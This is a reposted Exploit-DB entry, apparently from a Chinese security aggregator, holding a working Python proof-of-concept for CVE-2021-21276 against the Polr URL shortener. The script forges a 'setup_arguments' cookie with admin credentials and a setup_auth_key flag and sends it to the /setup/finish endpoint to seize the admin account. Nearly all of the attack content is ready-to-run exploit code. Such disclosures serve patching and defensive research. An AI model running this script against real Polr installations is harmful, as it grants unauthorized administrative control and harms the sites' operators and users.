[webapps] POLR URL 2.3.0 - Shortener Admin Takeover
2023-4-6 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:12 收藏
2023-4-6 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:12 收藏
# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover
# Date: 2021-02-01
# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>
# Vendor Homepage: -
# Software Link: https://github.com/cydrobolt/polr
# Version: < 2.3.0
# Tested on: Linux
# CVE : CVE-2021-21276
import json
import requests
payload = {
'acct_username': 'admin',
'acct_password': 'password',
'acct_email': '[email protected]',
'setup_auth_key': True,
}
r = requests.get('http://localhost/setup/finish',
cookies={'setup_arguments': json.dumps(payload)})
print(r.text)
文章来源: https://www.exploit-db.com/exploits/51277
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh